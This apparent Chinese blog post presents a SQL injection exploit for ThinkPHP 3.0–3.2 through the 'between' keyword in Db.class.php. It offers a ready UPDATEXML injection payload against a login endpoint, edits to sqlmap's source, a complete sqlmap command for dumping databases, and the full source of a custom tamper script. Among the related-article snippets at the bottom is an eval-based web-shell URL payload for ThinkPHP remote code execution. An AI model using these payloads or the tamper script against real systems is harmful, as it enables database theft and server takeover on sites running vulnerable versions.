ThinkPHP 3.0~3.2 注入漏洞

最新推荐文章于 2024-08-09 23:36:21 发布
最新推荐文章于 2024-08-09 23:36:21 发布
阅读量3.8k 收藏 3
点赞数 1
文章标签: php python 数据库

地址:http://xx.com/index.php/Admin.php?s=/User/Public/check

payload:act=verify&username[0]=='1')) AND UPDATEXML(6026,CONCAT(0x2e0x7167656371,(SELECT (CASE WHEN (6026=6026) THEN 1 ELSE 0 END)),0x716e726771),8197)-- 1between&username[1]=CN000001&password=xxxxxxxxxxx&image.x=65&image.y=15&_hash_=e23b2ac1ecea61a34252c0c93d28a8b6_b9327556a986738edb45004015776680

漏洞文件:ThinkPHP\Library\Think\Db.class.php

漏洞原因:parseWhereItem函数对between关键字的正则匹配错误,导致了SQL注入

 

问题:

1.TP对0x7167656371形式的数据都解释成是数据表的字段,因此对于sqlmap判断注入存在的关键字是无法利用的,需绕过。

2.GET请求时,由于TP的路由模式对URL中的参数取得时,未做URL解码处理,因此提交的时候不能使用URL编码,且不允许出现空格,会导致路由失效出现404。

3.sqlmap会对0x7167656371的字符串形式’qgecq‘做匹配,且大小写敏感,不然会造成无法识别注入点。

4.GET请求时在替换完payload时应该替换空白字符,但是POST时是不需要的

意味着–skip-urlencode参数可以根据需要添加

 

解决:

sqlmap的返回验证机制中有一个头关键字,可以观察所有的插入字符都是q开头的,且大小写敏感。因此需要修改这两处

lib/core/settings.pyKB_CHARS_BOUNDARY_CHAR = 'q' => KB_CHARS_BOUNDARY_CHAR = 'L'

lib/core/common.pyreturn retVal => return retVal.upper()

执行命令:

sqlmap.py -u "http://xx.com/index.php/ThinkPHP0day?key[0]=&key[1]=a" -p key[0] --prefix "='-'" --suffix "%23between" --tamper thinkphp0day.py --technique=U --dbms=mysql --union-char "156427916544" --skip-urlencode --dbs

 

thinkphp0day.py源代码:

#!/usr/bin/env python

import os

import random

import re

import binascii

 

from lib.core.common import singleTimeWarnMessage

from lib.core.enums import DBMS

from lib.core.enums import PRIORITY

 

__priority__ = PRIORITY.LOW

 

def dependencies():

    singleTimeWarnMessage("tamper script '%s' is only meant to be run against ThinkPHP 3.0~3.3" % (os.path.basename(__file__).split(".")[0]))

 

def tamper(payload, **kwargs):

    """

    Notes:

        * Useful to ThinkPHP

 

    Replace hex string

 

    >>> tamper("0x7163646271")

    ==> 'qcdbq'

 

    >>> tamper(" ")

    ==> '+'

 

    """

    blanks = '/**/';

    retVal = payload

 

    if payload:

        retVal = ""

        quote, doublequote, firstspace, end = False, False, False, False

        for i in xrange(len(payload)):

            if not firstspace:

                if payload[i].isspace():

                    firstspace = True

                    retVal += blanks

                    continue

            elif payload[i] == '\'':

                quote = not quote

            elif payload[i] == '"':

                doublequote = not doublequote

            elif payload[i] == '#' or payload[i:i + 3] == '-- ':

                end = True

            elif payload[i] == " " and not doublequote and not quote:

                if end:

                    retVal += blanks[:-1]

                else:

                    retVal += blanks

                continue

            retVal += payload[i]

 

    retValArray = retVal.split();

    retTmpArray = []  

    p = re.compile(r'(0x\w+)')

    def func(m):

        tmp = m.group(1).replace('0x','')

        tmp = tmp.replace('\\','\\\\')

        return '\'%s\'' % binascii.a2b_hex(tmp)  

 

    for val in retValArray:

        retTmpArray.append(p.sub(func,val).replace(' ',blanks))

        

    return " ".join(retTmpArray)

weixin_34348111
关注
ThinkPHP3.2.X SQL注入漏洞的解决方案
amaoatao的博客
03-09 3543
程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误5次账号暂停24小时(后台参数可设置) 5.密码要先在本地加密(SHA1) 6.涉及API接口对接的项目全部使用AES加密(每个项目最好使用不同的密...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP 漏洞利用工具
Websec
05-18 6319
当看到ThinkPHP十年磨一剑的提示,那么今天这里分享的工具就可以派上用场了,一键检测ThinkPHP全版本漏洞。 01、TPscan 一键ThinkPHP漏洞检测,基于Python3,命令行检测,集成了14个常见的ThinkPHP框架漏洞检测插件。 github项目地址: https://github.com/Lucifer1993/TPscan 02、Aazhen-V3.1 支持ThinkPHP 2.x RCE,Thinkphp5 5.0.22/5.1.29RCE,ThinkPHP5
thinkphp漏洞之sql注入漏洞-builder处漏洞
最新发布
banliyaoguai的博客
08-09 653
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
学习ThinkPHP3.2.2:video7,I函数的漏洞已经修改
10-02 1850
控制器中,显示用户名的一个方法: Public function handle(){     echo I('username'); } 如果输入用户名时候,输入:alert(111); tp3.1下,执行上面方法,会在页面跳出提示框,但是现在3.2.2版本不会了。 将会直接在页面输出:
ThinkPHP漏洞总结(利用)
热门推荐
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 2909
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
ThinkPHPSQL0day:ThinkPHP3.0~3.3 betweenSQL注入的sqlmap Tamper!
07-02
"ThinkPHPSQL0day:ThinkPHP3.0~3.3 betweenSQL注入的sqlmap Tamper!" 这个标题提到了一个针对ThinkPHP框架的SQL0day漏洞,即一个未公开的安全漏洞。这个漏洞出现在ThinkPHP3.0到3.3版本之间,具体涉及的是SQL注入...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
thinkphp3.0
12-21
9. 安全防护:为了保证应用程序的安全性,ThinkPHP3.0提供了诸如防止SQL注入、XSS攻击、CSRF攻击等安全防护措施,降低了系统被恶意攻击的风险。 10. 文档资源:在提供的“说明.htm”中,可能详细介绍了ThinkPHP3.0...
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
《深入理解ThinkPHP3.2框架》 ThinkPHP,作为国内广泛应用的PHP开发框架,以其简洁、高效和易用性赢得了开发者们的喜爱。本篇将详细介绍ThinkPHP3.2版本,该版本在2013年12月31日进行了更新,其环境要求为PHP5.3及...
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
Thinkphp3全漏洞分析
灰太的表格的博客
01-23 6421
thinkphp漏洞复现
YouthBelief的博客
10-25 3032
thinkphp漏洞前言一、thinkphp-2x-rce 代码执行0x01 漏洞描述0x02 影响版本0x03 漏洞利用0x04 漏洞修复二、thinkphp 代码执行 (CNVD-2018-24942)0x01 漏洞描述0x02 影响范围0x03 漏洞利用这就完成了,这边我们引用下大佬的poc0x04 漏洞修复三、 thinkphp3.2.x 代码执行0x01漏洞描述0x02影响范围0x03漏洞利用payload0x04漏洞修复四、thinkphp 命令执行 (CVE-2018-1002015)0x01
ThinkPHP 3.2漏洞的探讨
Li91314的博客
07-11 460
远程代码执行漏洞是由于在模板赋值方法assign的第一个参数可控时,模板文件路径变量被覆盖为携带攻击代码的文件路径,导致攻击者可以执行任意代码。本文将针对ThinkPHP 3.2漏洞进行详细的探讨,分析其产生的原因、影响以及应对策略。作为开发者或网站运营者,我们应重视这些漏洞的存在,并采取相应的应对策略来保障Web应用的安全性。通过升级版本、严格审查代码、加强安全配置以及监控和日志审计等措施,我们可以有效地防范和应对ThinkPHP 3.2漏洞带来的安全风险。四、ThinkPHP 3.2漏洞的影响。
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 8800
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现 在ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
thinkphp任意代码执行漏洞
cnbird's blog
05-16 9934
http://site.com/index.php/module/action/param1/${@phpinfo()} 直接拿SHELL index.php/module/action/param1/${@eval%28$_POST[c]%29} 密码:c
漏洞复现】ThinkPHP3.2.x RCE 漏洞复现
m0_46344990的博客
04-10 4413
目录 一,漏洞描述 二,漏洞发现 三、漏洞利用 本人是一个小白,目前大三计算机专业,出于对网络安全的热爱自学了好久。在学习网络安全的路上简直坎坷,有时候迷茫有时候又找到了方向,全凭自己摸索。啊,真希望有个老师傅能带带我。这也是我第一次复现漏洞,还不会thinkphp框架,就先看视频自学了几天,才把这个漏洞琢磨透。。。结合网上其他文章修改总结了一下。要是有错误或者不合理的地方,也请多多担待。 一,漏洞描述 描述: ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框...
thinkphp3.1.3 getshell_两个weblogic的漏洞的Getshell验证
weixin_39873456的博客
11-11 910
本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工具即可。在这里就不分享了,只分享payload请求代码。有问题可以留言。Webl...
ThinkPHP3.0 完整开发指南
"ThinkPHP3.0 完全开发手册" ThinkPHP3.0 是一个流行的中国开源PHP框架,用于快速构建高效、可扩展的Web应用。这个完全开发手册旨在为开发者提供详尽的指导,帮助他们掌握ThinkPHP3.0 的核心概念、架构和最佳实践。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值